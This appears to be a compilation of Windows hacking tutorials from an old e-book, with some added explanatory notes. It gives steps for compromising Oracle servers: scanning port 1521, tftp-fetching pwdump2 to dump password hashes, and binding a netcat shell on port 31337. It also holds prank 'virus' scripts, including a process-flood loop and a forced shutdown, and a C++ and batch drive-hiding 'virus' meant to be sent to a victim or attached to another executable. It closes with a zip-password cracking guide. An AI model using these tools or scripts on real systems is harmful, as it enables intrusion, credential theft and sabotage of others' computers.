Needed Files: Java Runtime Environment (www.javasoft.com) and classes111.zip (www.oracle.com)
Background: The Oracle Auditing Tools are to be run against Oracle servers on the Microsoft Windows platform.
How To Use: Extract Oracle.rar to a chosen directory. Now scan with Scan1000.exe on port 1521 over some range and wait until you find something. When you find a machine, you need to exploit it: simply go to the extracted directory, type cd oat, and then ose -s Machine'sIP. Now you should see that the machine is exploited, and an NC session is starting on port 31337. Use NC.exe to connect to the target machine on port 31337 (NC.exe [Machine's IP] [Port]).
Files Explanations:
OracleSamDump - Connects to the Oracle server and executes a TFTP get to fetch the pwdump2 binary.
The server is then pwdump2:ed and the result is returned to the SAM folder of the TFTP server.
OracleSysExec - Can be run in interactive mode, letting the user specify commands to be executed by the server, or in automatic mode. In automatic mode, netcat is tftp'd over to the server and binds a shell to TCP port 31337.
OracleTNSCtrl - Is used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though. Use the help command to see the commands currently implemented.
How To Secure: To protect the machine, upgrade the Oracle server (http://www.oracle.com - Oracle 8.1.6 is the latest version).
http://members.lycos.nl/forallmymembers/exploit/Oracle.rar

Ports list:
0 Reserved
1 Port Service Multiplexer
2 Management Utility
3 Compression Process
4 Unassigned
5 Remote Job Entry
6 Unassigned
7 Echo
8 Unassigned
9 Discard
10 Unassigned
11 Active Users
12 Unassigned
13 Daytime
14 Unassigned
15 Unassigned
16 Unassigned
17 Quote of the Day
18 Message Send Protocol
19 Character Generator
20 File Transfer [Default Data]
21 File Transfer [Control]
22 SSH Remote Login Protocol
23 Telnet
24 any private mail system
25 Simple Mail Transfer
26 Unassigned
27 NSW User System FE
28 Unassigned
29 MSG ICP
30 Unassigned
31 MSG Authentication
32 Unassigned
33 Display Support Protocol
34 Unassigned
35 any private printer server
36 Unassigned
37 Time
38 Route Access Protocol
39 Resource Location Protocol
40 Unassigned
Spearway Lockser

VISUAL BASIC VIRUS PROGRAMMER BY TAHIR:

Backspacehack:
MsgBox "Let's go back a few steps"
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
saveas tahir.vbs

capslockhack:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
saveas tahir.vbs

cdromcloseopen:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

cdromejecthelper:
Wscript.Sleep 100
On Error Resume Next
StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("watch as I open your cd drive")
Wscript.Sleep 1000
Set objAction = objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Wscript.Sleep 100
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.CdromCollection
If colCDROMs.Count >= 1 then
For I = 0 to colCDROMs.Count - 1
ColCDROMs.Item(I).Eject
Next ' cdrom
End If
Saveas tahir.vbs

Continually pop the CD Drive:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
saveas tahir.vbs

dancehackcapslock,scrolllock,numlock:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
saveas tahir.vbs

ejectcdrom:
do
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
Loop
Saveas tahir.vbs

Enterhack:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
saveas tahir.vbs

foolhackmessage:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
Loop
Saveas tahir.vbs

hackcapslock,scrolllock,numlocksdance:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop
saveas tahir.vbs

helper Microsoft:
On Error Resume Next
StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("Hi I'm Tahir here to take control of your computer")
Wscript.Sleep 1000
Set objAction = objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Saveas tahir.vbs

helperopenInternetExplorer:
Wscript.Sleep 100
On Error Resume Next
StrAgentName2 = "MERLIN"
StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs"
Set objAgent2 = CreateObject("Agent.Control.2")
ObjAgent2.Connected = TRUE
ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
ObjPeter.MoveTo 700,300
ObjPeter.Show
ObjPeter.Play "GetAttention"
ObjPeter.Play "GetAttentionReturn"
ObjPeter.Speak("lol I now open internet explorer")
Wscript.Sleep 1000
Set objAction = objPeter.Hide
Do While objPeter.Visible = True
Wscript.Sleep 250
Loop
Wscript.Sleep 100
Page 69
Power Of Hacking Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "iexplore http://www.Google.Com", 9 WScript.Sleep 10000 ' Give ie some time to load Saveas tahir.vbs Registryenableordisable:'Enable/Disable Registry Editing tools 'Š Doug Knox - rev 12/06/99 'This code may be freely distributed/modified as long as it remains free of charge 'http://www.icpug.org.uk/national/features/030607fe.htm 'Edited by PatheticCockroach - http://patheticcockroach.com
Option Explicit
'Declare variables
Dim WSHShell, rr, rr2, MyBox, val, val2, ttl, toggle
Dim jobfunc, itemtype

On Error Resume Next

Set WSHShell = WScript.CreateObject("WScript.Shell")
val = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
val2 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
itemtype = "REG_DWORD"
jobfunc = "Registry Editing Tools are now "
ttl = "Result"

'reads the registry key value.
rr = WSHShell.RegRead(val)
rr2 = WSHShell.RegRead(val2)

toggle = 1
If (rr = 1 Or rr2 = 1) Then toggle = 0

If toggle = 1 Then
    WSHShell.RegWrite val, 1, itemtype
    WSHShell.RegWrite val2, 1, itemtype
    MyBox = MsgBox(jobfunc & "disabled.", 4096, ttl)
Else
    WSHShell.RegDelete val
    WSHShell.RegDelete val2
    MyBox = MsgBox(jobfunc & "enabled.", 4096, ttl)
End If

Save as tahir.vbs

Two things to know before running it. RegRead raises an error when the value does not exist yet, which On Error Resume Next swallows (rr stays Empty, so the first run disables, which is the intended toggle). Writing the HKLM value needs administrator rights: as a standard user that RegWrite fails silently, only the per-user HKCU policy is set, and the message box still says "disabled". The policy only affects regedit.exe; reg.exe ignores it, so if the script is lost, "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /f" (and the same for HKLM, elevated) undoes it.

Sleepvirus. This is a batch file, not VBScript (the page says "Saveas tahir.vbs"; it must be saved as tahir.bat). Everything it claims to delete is only echoed; the real side effects are a directory called h4x (the page's path is the Windows XP All Users Start Menu, which does not exist on later Windows, so mkdir then runs in whatever the current directory is) and the forced shutdown at the end. The helper .vbs files are written with the redirection placed before the echo: cmd treats a digit immediately followed by > as a file-handle number, so "echo Wscript.Sleep 5000>C:\sleep5000.vbs" as originally written prints "Wscript.Sleep 500" to the console, leaves the file empty, and none of the delays happen.

cls
:A
color 0a
cls
@echo off
>C:\sleep5000.vbs echo Wscript.Sleep 5000
>C:\sleep3000.vbs echo Wscript.Sleep 3000
>C:\sleep4000.vbs echo Wscript.Sleep 4000
>C:\sleep2000.vbs echo Wscript.Sleep 2000
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd "C:\Documents and Settings\All Users\Start Menu\Programs\"
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."

Save as tahir.bat (shutdown -a, typed within the shutdown timeout, aborts the shutdown)

Slowmessageappearhack (waits a little over three minutes, opens Notepad and types the author's message a few characters at a time; the fragments together spell the text, so change them together if you change the message):

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Tahir"
WScript.Sleep 500
WshShell.SendKeys "Zahid "
WScript.Sleep 500
WshShell.SendKeys ", Sana"
WScript.Sleep 500
WshShell.SendKeys "Ullah"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save as tahir.vbs

Text-To-Audio (speaks whatever is typed into the input box through the SAPI voice):

Dim msg, sapi
msg = InputBox("Enter your text for conversion - mtahirzahid.blogspot.com", "TechVorm Text-To-Audio Converter")
Set sapi = CreateObject("sapi.spvoice")
sapi.Speak msg

Save as tahir.vbs

virusdownload (Merlin again; the "download" is only spoken, nothing is fetched):
WScript.Sleep 100
On Error Resume Next
strAgentName2 = "MERLIN"
strAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".acs"
Set objAgent2 = CreateObject("Agent.Control.2")
objAgent2.Connected = True
objAgent2.Characters.Load strAgentName2, strAgentPath2
Set objPeter = objAgent2.Characters.Character(strAgentName2)
objPeter.MoveTo 700, 300
objPeter.Show
objPeter.Play "GetAttention"
objPeter.Play "GetAttentionReturn"
objPeter.Speak "downloading virus . . . 20% . . . 40% . . . 60% . . . 80% . . . 100% virus downloaded"
WScript.Sleep 1000
Set objAction = objPeter.Hide
Do While objPeter.Visible = True
    WScript.Sleep 250
Loop

Save as tahir.vbs

virusvbs (please save as tahir.vbs). This starts the Windows XP tour (tourstart.exe) up to one hundred million times; each Run call launches a new process without waiting for it, so the machine becomes unusable long before the loop ends and the only remedy is to kill wscript.exe. On Windows versions without tourstart.exe, WshShell.Run raises a "file not found" error on the first iteration and, with no On Error Resume Next, the script stops there:

Option Explicit
Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
Dim x
For x = 1 To 100000000
    WSHShell.Run "Tourstart.exe"
Next
4 Ways to Hide Hard Drive on your PC

This trick can be used for mere entertainment, when you prepare a computer prank for your friends or colleagues, but it may also be useful for practical reasons when you share your computer with other people. The question addressed is "How to hide a hard drive on your computer?", and several options are given to satisfy the needs of all readers of this blog.

One caveat applies to the HDHide, TweakUI and registry methods: they hide the drive letter from Explorer and from the common Open/Save dialogs, nothing more. The volume stays mounted and readable, so anyone who types the path into the address bar, a command prompt or a script gets to the data. If the goal is to keep other users of the machine out, use NTFS permissions (or full-disk encryption) rather than hiding; hiding is a convenience, not access control.

1. With HDHide freeware

Hide Drives (HDHide) can be used to hide or unhide drive letters A: to Z: on any computer running Windows 95/98/ME/NT/2000/XP, whether they are physical drives on the local machine or logical drives (partitions, server volumes, mapped drives, etc.). The hidden drive letters are not visible in Explorer or in any other application that uses the common Windows Save, Save As or Open dialog boxes. The software is small, easy to use and completely portable (it does not need to be installed), so if you want a simple and straightforward solution this method will fit your needs. Direct download link: http://www.ziddu.com/download/2741816/hdhide.zip.html
[Screenshot of HDHide omitted]

2. With TweakUI freeware

TweakUI is part of the Microsoft PowerToys utilities and can do much more than hide hard drives. It gives you access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings and more. After installing, go to Start > Programs > PowerToys for Windows XP > TweakUI. Expand My Computer, click Drives, then uncheck the drives you wish to hide. Direct download link: http://www.ziddu.com/download/2741877/TweakUiPowertoySetup.exe.html

3. With the built-in Diskpart utility

This way does not require installing or using any additional software, since you can achieve the same result using nothing more than the Command Prompt. Here is how:
- Click Start -> Run (this brings up the Run dialog box)
- Type cmd and press Enter (this brings up the Windows Command Prompt)
- Type diskpart and press Enter (this launches the Diskpart utility inside the Command Prompt window)
- Type list volume (this displays all mounted volumes and their drive letters)
[Screenshot of the list volume output omitted]
- Using the listing as reference, if for example you would like to hide drive E, type select volume 6 (the number shown for that volume)
- Now type remove letter=E (Note: the page says this action requires a reboot). Diskpart removes the drive letter, and the drive is no longer available via Windows Explorer or My Computer.
To unhide the drive and make it accessible again, repeat the above process but type assign letter=E instead of remove letter=E.

Unlike the other three methods, this one takes the letter away, so the volume cannot be reached by a drive path until a letter is assigned again; an administrator can still do that with diskpart or mountvol.

4. By registry modification

- Open the Registry Editor: go to Run, type regedit (without quotes) and press Enter.
- Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
- Right-click in the right-hand pane and create a new DWORD value. Name it NoDrives. Double-click NoDrives and enter a Decimal value. The value depends on the drives you wish to hide and is made by adding the numbers for each drive from the list below; click OK once you have entered it. For example, to hide drive D you would enter a decimal value of 8. To hide both drives D and E you would enter 24 (8+16).

Values for each drive letter (one bit per letter, A: is bit 0 and Z: is bit 25):
A = 1
B = 2
C = 4
D = 8
E = 16
F = 32
G = 64
H = 128
I = 256
J = 512
K = 1024
L = 2048
M = 4096
N = 8192
O = 16384
P = 32768
Q = 65536
R = 131072
S = 262144
T = 524288
U = 1048576
V = 2097152
W = 4194304
X = 8388608
Y = 16777216
Z = 33554432
All drives = 67108863

Once you restart your computer, the selected drives should be hidden. To show the hidden drives again, browse to the NoDrives registry value and delete it. The same value under HKEY_LOCAL_MACHINE applies to every user of the machine; that is the key the C++ and batch code below write.

C++ "virus" to hide drives (the title says all drives, but the value 12 it writes hides only C: and D:):
C++ Virus Code:

#include <windows.h>
#include <shellapi.h>   // ShellExecuteA; link against shell32
#include <fstream>      // the page used the pre-standard <fstream.h>/<iostream.h> headers

int main()
{
    /* open (or create) a batch file in system32; writing there needs administrator rights */
    std::ofstream write("C:\\WINDOWS\\system32\\HackingStar.bat");
    /* 12 = 4 + 8, i.e. C: and D:; the \\ and \n are C++ escapes, not part of the batch text */
    write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n";
    write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoViewOnDrive /t REG_DWORD /d 12\n";
    write << "shutdown -r -c \"Sorry Your System is hacked by us!\" -f\n";
    write.close();  // close file
    ShellExecuteA(NULL, "open", "C:\\WINDOWS\\system32\\HackingStar.bat", NULL, NULL, SW_SHOWNORMAL);
    return 0;
}

Copy the above code and paste it into Notepad, save the file with a .cpp extension, and compile it to an .exe.
Note: Don't run this C++ program yourself; it acts on the system it runs on. The page then says to copy the created .exe and send it to your victim, or attach it to any other exe file.

What it actually does: both REG ADD lines write the machine-wide Explorer policy, so they need administrator rights (an elevated prompt on Vista and later; unelevated they fail and only the reboot happens). NoDrives hides C: and D: in Explorer, NoViewOnDrive makes Explorer refuse to open them, and neither stops a command prompt from reaching the volumes. To undo: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /f, the same for NoViewOnDrive, then log off and on again.
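The NoDrives value of the registry method and the /d 12 in the C++ code above are the same 26-bit mask, one bit per drive letter. The following Python script is an added example, not the page's code: it turns a set of letters into the decimal value and, more usefully when you are looking at a machine where drives have "disappeared", turns a value copied out of reg query back into the letters it hides. It reads nothing from the registry; the sample values are constructed.

```python
"""NoDrives / NoViewOnDrive bitmask helper (added example, not the page's code)."""
import string

ALL_DRIVES = (1 << 26) - 1   # 67108863, the "All drives" value in the table above


def drives_to_mask(letters):
    """Return the decimal NoDrives value that hides the given drive letters.

    Bit 0 is A:, bit 1 is B:, ... bit 25 is Z:, so C: and D: give 4 + 8 = 12.
    Accepts "C", "c" or "C:".
    """
    mask = 0
    for raw in letters:
        letter = raw.strip().upper().rstrip(":")
        if len(letter) != 1 or letter not in string.ascii_uppercase:
            raise ValueError(f"not a drive letter: {raw!r}")
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


def mask_to_drives(mask):
    """Return the sorted list of drive letters hidden by a NoDrives value."""
    if not 0 <= mask <= ALL_DRIVES:
        raise ValueError(f"NoDrives value out of range: {mask}")
    return [string.ascii_uppercase[i] for i in range(26) if mask & (1 << i)]


def describe_policy(values):
    """Decode the Explorer policy values found on a host.

    `values` maps value name to DWORD, as you would copy them out of
    reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
    (constructed input here; nothing is read from the live registry).
    NoDrives only hides letters in Explorer; NoViewOnDrive makes Explorer refuse
    to open them. Neither stops a command prompt from reaching the volume.
    """
    report = {}
    for name in ("NoDrives", "NoViewOnDrive"):
        if name in values:
            report[name] = mask_to_drives(int(values[name]))
    return report


if __name__ == "__main__":
    # Constructed sample matching the /d 12 values in the C++ code above
    found = {"NoDrives": 12, "NoViewOnDrive": 12}
    print(drives_to_mask(["C", "D"]))     # 12
    print(mask_to_drives(24))             # ['D', 'E']
    print(describe_policy(found))         # {'NoDrives': ['C', 'D'], 'NoViewOnDrive': ['C', 'D']}
```

The range check matters when decoding: a value above 67108863 did not come from a drive-hiding tool and is worth a second look rather than a silent truncation.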
Batch Virus Code Creation:

The batch version does the same thing without a compiler. The page's copy still carried the C++ string escapes (doubled backslashes, a literal \n at the end of each line and \" around the message); in a .bat file those are wrong, so they are removed here:

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDrives /t REG_DWORD /d 12
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v No ViewOnDrive /t REG_DWORD /d 12
shutdown -r -c "Sorry Your System is hacked by us!" -f

I think this will be simpler for non-C++ programmers; it is easy to create the batch file too. Copy the above code to Notepad, save it with a .bat extension (for example nodrivevirus.bat) and send the file to your victim. It needs the same administrator rights as the C++ version and is undone the same way (reg delete of the two values).

Changing the Start button text in Windows XP (estimated time 5-15 minutes, level: advanced user)

I always wanted to change the text of my Start button ever since I have been using Windows. It has always been one of the most difficult tasks to accomplish, involving risky and lengthy alteration of the Windows registry. In fact I could never find a way to change the Start button text without altering registry values. (If you know of one, please let me know so that it can be posted here for others; also let me know if there is software that does it automatically.) The simplest and least time-consuming way of changing the Start button text is described below.

Step 1: Create a System Restore point, so that if something goes wrong you can roll back to the original settings. Make a backup copy of explorer.exe in a safe place, maybe in a different folder.

Step 2: Download a small freeware utility called Resource Hacker. "Resource Hacker(TM) is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems." (excerpt from the Resource Hacker website)
Click here to download Resource Hacker
Click here to visit the Resource Hacker web page

Step 3: Open Resource Hacker. Click File -> Open and open explorer.exe.

Step 4: Expand String Table -> 37 in the tree view and click 1033, as shown in the figure (the numbers are those of the English Windows XP explorer.exe; other builds differ).
[Screenshot omitted]

Step 5: In the right-hand window, next to entry 578 where "start" is written, edit the text to what you want on your Start button.

Step 6: Click the "Compile Script" button at the top of the right-hand window. Now click File -> Save As and save as wintipz.exe. (Saving under a new name matters: explorer.exe is covered by Windows File Protection, which would put the original back if you overwrote it.)

Step 7: Open the Registry Editor (Start -> Run, type regedit). Navigate to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. In the right pane double-click Shell and replace "explorer.exe" with "wintipz.exe" as shown in the figure, then exit the Registry Editor.
[Screenshot omitted]

Step 8: Restart your computer to see the changes.

The Winlogon Shell value is also a well-known persistence point: whatever it names runs as the desktop shell at every logon, which is exactly why malware changes it. If wintipz.exe is missing or damaged you will log on to an empty desktop; recovery is Ctrl+Shift+Esc -> File -> New Task -> regedit and setting Shell back to explorer.exe, which is also the check a defender makes on a suspect machine.

Changing the title of Windows Media Player

You can change the title bar of Windows Media Player:
1. Start regedit
2. Go to HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\WindowsMediaPlayer
3. Create a string value named TitleBar
4. Give it whatever value you want to appear in the title bar

Cracking password-protected zip files

What is FZC?

FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected, which means you need a password to open the zip file and extract files from it. You can get it anywhere; just use a search engine such as google.com.
FZC uses multiple methods of cracking: brute force (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks; instead of guessing systematically, the program takes passwords out of a "wordlist", a text file of possible passwords; you can get lots of wordlists at www.theargon.com). FZC can be used for two different goals: to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you are not supposed to have. So like every tool, this one can be used for good and for evil.

Reading this tutorial is the easy way to learn how to use the program, but after reading it you should go and read the text files that come with it. You will see the phrase "check name.txt" often in this text; those files should be in FZC's directory and contain more information about FZC.

FZC is a good password recovery tool because it is fast and supports resuming, so you do not have to keep the computer turned on until you get the password, as with older cracking programs. You will probably always get the password unless it is longer than 32 chars (a char is a character, which can be anything: a number, a lowercase or uppercase letter, or a symbol such as ! or &), because 32 chars is the maximum FZC will accept; it does not really matter, because brute-forcing a 32-char password would take longer than a lifetime. To see the time FZC takes with brute force, open the Bforce.txt file, which contains that information.

Two things the tutorial predates: FZC only handles the traditional PKZIP ("ZipCrypto") encryption, not the AES encryption newer zip tools offer, and ZipCrypto itself is broken by a known-plaintext attack (Biham and Kocher, 1994), so if you know a few bytes of any file inside the archive, recovering the keys is far cheaper than guessing the password.

FZC supports brute-force attacks as well as wordlist attacks. Brute-force attacks do not require you to have anything; wordlist attacks require wordlists, which you can get from www.theargon.com. There are wordlists in various languages and on various topics, or just miscellaneous wordlists. The bigger the wordlist, the more chances you have to crack the password. Once you have a good wordlist, get FZC working on the locked zip file, grab a drink, lie down and wait (how to start a wordlist attack is explained further down).

Keep in mind that some people choose really weird passwords (for example 'e8t7@$^%*gfh), which practically no wordlist will contain. If you have a file like that, even a 200 MB list will not help, and you have to fall back on a brute-force attack. If you are the kind of person who gives up at the first sign of failure, stop being like that or you will not get anywhere. FZC has settings for all sorts of hardware and automatically selects the best method, so a fast machine is used to the fullest.

Now that the theory is done, the actual commands.

Brute force

The command line for brute force is:

fzc -mb -nz<File.zip> -l<length> -c<type of chars>

Bforce.txt, which comes with FZC, describes the length and type-of-chars switches, but here is the short version (read Bforce.txt too). For the length you can use four kinds of value:
-> a range, for example 4-6: brute-force from 4-char passwords to 6-char passwords
-> a single length, for example 5: only passwords with 5 chars
-> 0: start from length 0 and go up to length 32 (nobody should want to do this)
-> a number with a + sign, for example 3+: from 3-char passwords up to 32 chars, almost like the previous option

For the type of chars there are five switches:
-> a for lowercase letters
-> A for uppercase letters
-> ! for symbols (check Bforce.txt to see which symbols)
-> s for space
-> 1 for numbers

Example: to find a password made of lowercase letters and numbers by brute force:

fzc -mb -nzTest.zip -l4-7 -ca1

This tries all combinations from 4 chars up to 7 chars, using only numbers and lowercase letters.

Hint: never start the first brute-force attack on a file with all the char switches. First try lowercase only, then uppercase, then uppercase with numbers, then lowercase with numbers; you may get lucky and find the password much faster. Only if that fails, prepare yourself for a brute force that takes a long time, with a combination of lowercase, uppercase, special chars and numbers.

Wordlist

As said above, the wordlist mode is the most powerful mode in this program. Within it you can choose between 3 modes, each of which applies some changes to the words in the wordlist; what each mode does is described in wlist.txt. The best mode for getting passwords is mode 3, but it also takes the longest. To start a wordlist attack:

fzc -mw<mode number> -nz<File.zip> -nw<Wordlist>

where the mode number is 1, 2 or 3 (check wlist.txt for the changes each makes), File.zip is the archive and Wordlist is the wordlist you want to use. If the file or the wordlist is not in FZC's directory you need to give the full path. Other switches can be added: -f<line> sets the line at which FZC starts reading, and -l<char length> restricts it to words of that length, with the same syntax as in brute-force mode. So with

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC starts reading at line 50 and only tries words of length 9 or more.

Example: to crack myfile.zip with the "theargonlistserver1.txt" wordlist in mode 3, starting at line 50:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50

Resuming

Another good feature is that FZC supports resuming. If you need to shut down the computer while FZC is running, press the ESC key and FZC stops. In a brute-force attack the current status is saved in a file called resume.fzc; in a wordlist attack FZC tells you at which line it stopped (the line is also in fzc.log). To resume the brute-force attack:

fzc -mr

and it continues from where it stopped when you pressed ESC. To resume a wordlist attack you start a new wordlist attack that says where to begin, so if the attack on file.zip with wordlist.txt in mode 3 ended at line 100:

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100
FZC then starts at line 100, since the first 99 lines were already checked in the earlier session. That covers most of what you need to know; do not forget to read the files that come with the program.

Delete an undeletable file

This tutorial is for everyone who wants to delete a file but cannot, for one reason or another (usually because a process still has it open). Be aware that, whichever way you do it, deleting only removes the directory entry: the data stays on disk until it is overwritten and is recoverable with forensic tools, so none of this leaves "no trace". Beware: make sure the file you are deleting is not a system file.

Method 1: stop the shell that holds the file open
- Open a Command Prompt window and leave it open. Close all open programs.
- Click Start, Run and enter TASKMGR.EXE.
- Go to the Processes tab and End Process on explorer.exe. Leave Task Manager open.
- Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is in.
- At the command prompt type DEL <filename>, where <filename> is the file you wish to delete.
- Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell. Close Task Manager.

Method 2: overwrite it from Notepad
- Open Notepad.
- Click File > Save As and locate the folder that contains the undeletable file.
- Choose "All files" in the file type box.
- Click once on the file you want to delete so that its name appears in the filename box.
- Put a " at the start and the end of the filename (the filename should keep the extension of the undeletable file so that it overwrites it).
- Click Save. It asks whether to overwrite the existing file; choose Yes, and you can then delete it as normal.

Method 3: the manual way from the command line
- Start > Run, type cmd.
- To move into a directory type cd c:\*** (the stars stand for your folder).
- If you cannot enter the folder because its name has spaces, for example Program Files or the Kazaa Lite folder, instead of typing the full folder name take the first 6 letters, then ~ and then 1, without spaces. Example: cd c:\progra~1\kazaal~1
- Once you are in the folder that holds the non-deletable file, type dir and a list of everything inside comes up.
- To delete the file type del ***.bmp (or .txt, .jpg, .avi, etc., the stars standing for the file name). If the file name has spaces, use the same first-6-letters-then-~1 rule. Example: if your file name was bad file.bmp you would type del badfil~1.bmp once in the folder, and the file should be gone. Make sure to type the correct extension.

The ~1 rule is a guess at the 8.3 short name; when several names share the same first six characters the suffixes are ~2, ~3 and so on, and short names may not exist at all if 8.3 name creation is disabled on the volume. dir /x shows the real short name next to each long one, which removes the guesswork. Quoting the long name (del "bad file.bmp") also works and does not depend on short names.

Email tracker

Here we take the case of Google Mail and Yahoo! Mail to find the full header.

Google Mail. Log in to Gmail with your id/password. Open the mail for which you wish to find the full header of the sender. Click the inverted triangle next to Reply, then Show original. You get something like this:

Delivered-To: MrRakesh@gmail.com
Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 12 September 2007 15:11:47 -0800 (PST)
Return-Path: MrJones@emailprovider.com
